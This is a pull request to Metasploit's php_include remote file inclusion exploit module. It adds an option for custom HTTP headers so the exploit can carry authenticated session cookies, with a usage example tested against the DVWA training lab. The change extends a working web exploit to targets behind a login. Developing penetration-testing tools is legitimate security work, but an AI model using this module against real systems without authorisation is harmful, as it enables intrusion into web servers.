### PR TITLE
Added header support to php_include module

### DIFF
--- a/modules/exploits/unix/webapp/php_include.rb
+++ b/modules/exploits/unix/webapp/php_include.rb
@@ -1,5 +1,5 @@
 ##
-# $Id$
+# $Id: php_include.rb 14774 2012-02-21 01:42:17Z rapid7 $
 ##
 
 ##
@@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			},
 			'Author'         => [ 'hdm' , 'egypt', 'ethicalhack3r' ],
 			'License'        => MSF_LICENSE,
-			'Version'        => '$Revision$',
+			'Version'        => '$Revision: 14774 $',
 			#'References'     => [ ],
 			'Privileged'     => false,
 			'Payload'        =>
@@ -57,6 +57,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			OptString.new('PATH', [ true , "The base directory to prepend to the URL to try", '/']),
 			OptString.new('PHPURI', [false, "The URI to request, with the include parameter changed to XXpathXX"]),
 			OptString.new('POSTDATA', [false, "The POST data to send, with the include parameter changed to XXpathXX"]),
+			OptString.new('HEADERS', [false, "Any additional HTTP headers to send, cookies for example. Format: \"header:value,header2:value2\""]),
 			OptPath.new('PHPRFIDB', [false, "A local file containing a list of URLs to try, with XXpathXX replacing the URL",
 				File.join(Msf::Config.install_root, "data", "exploits", "php", "rfi-locations.dat")
 				])
@@ -69,9 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			uri.gsub!(/\?.*/, "")
 			print_status("Checking uri #{uri}")
 			response = send_request_raw({ 'uri' => uri})
-			if response.code == 200
-				return Exploit::CheckCode::Detected
-			end
+			return Exploit::CheckCode::Detected if response.code == 200
 			print_error("Server responded with #{response.code}")
 			return Exploit::CheckCode::Safe
 		else
@@ -79,8 +78,19 @@ class Metasploit3 < Msf::Exploit::Remote
 		end
 	end
 
-	def php_exploit
+	def datastore_headers
+		headers = datastore['HEADERS'] ? datastore['HEADERS'].dup : ""
+		headers_hash = Hash.new
+		if (headers and ! headers.empty?)
+			headers.split(',').each do |header|
+				key,value = header.split(':')
+				headers_hash[key] = value.strip
+			end
+		end
+		headers_hash
+	end
 
+	def php_exploit
 		uris = []
 
 		tpath = datastore['PATH']
@@ -129,6 +139,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					response = send_request_raw( {
 						'global' => true,
 						'uri'    => tpath+uri,
+						'headers' => datastore_headers,
 					}, timeout)
 				elsif http_method == "POST"
 					response = send_request_raw(
@@ -137,11 +148,10 @@ class Metasploit3 < Msf::Exploit::Remote
 							'uri'     => tpath+uri,
 							'method'  => http_method,
 							'data'    => postdata,
-							'headers' =>
-							{
+							'headers' => datastore_headers.merge({
 								'Content-Type'   => 'application/x-www-form-urlencoded',
-								'Content-Length' => postdata.length,
-							}
+								'Content-Length' => postdata.length
+							})
 						}, timeout)
 				end
 				handler


### PR DESCRIPTION
Hi,

This is my first pull request so if I have done anything wrong please let me know so that I can avoid doing so next time.

The following changes will allow users to set HTTP headers. This will allow users to exploit vulnerabilities that require authentication by sending authenticated session cookies.

Usage:
set HEADERS "Cookie: security=low; PHPSESSID=vu8ljn4smpaj5j6p99cqqnbn85"

I've tested it against DVWA's file inclusion vulnerability, both using GET and POST requests and it worked.

Thanks,
Ryan
